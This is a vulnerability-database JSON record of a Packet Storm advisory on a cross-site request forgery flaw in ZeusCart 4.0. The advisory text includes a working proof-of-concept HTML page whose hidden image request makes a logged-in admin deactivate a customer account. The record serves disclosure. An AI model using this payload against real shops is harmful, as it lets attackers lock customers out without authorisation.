{"id": "PACKETSTORM:150883", "type": "packetstorm", "bulletinFamily": "exploit", "title": "ZeusCart 4.0 Cross Site Request Forgery", "description": "", "published": "2018-12-22T00:00:00", "modified": "2018-12-22T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/150883/ZeusCart-4.0-Cross-Site-Request-Forgery.html", "reporter": "mqt", "references": [], "cvelist": [], "lastseen": "2018-12-25T18:50:53", "viewCount": 9, "enchantments": {"score": {"value": 0.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.6}, "sourceHref": "https://packetstormsecurity.com/files/download/150883/zeuscart40-xsrf.txt", "sourceData": "`# Exploit Title: ZeusCart 4.0 Deactivate Customer Accounts CSRF \n# Date: 12/20/2018 \n# Exploit Author: mqt \n# Vendor Homepage: http://www.zeuscart.com/ \n# Version: Zeus Cart 4.0 CSRF \n \n1. Vulnerability Description \n \nBecause the admin form is not validated against forged requests (no anti-CSRF token), ZeusCart 4.0 suffers from a Cross \nSite Request Forgery vulnerability: an attacker can \nperform actions on behalf of a victim by having the victim visit an \nattacker-controlled site while logged in. \n \nIn this case, the attacker is able to \"deactivate\" any customer \naccount, which means that the account is banned and cannot log in. \n \nProof of Concept: \n<html> \n<body> \n<img style=\"display:none\" src=\"http://localhost/admin/?do=regstatus&action=deny&id=2\" alt=\"\"> \n</body> \n</html> \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645636768}}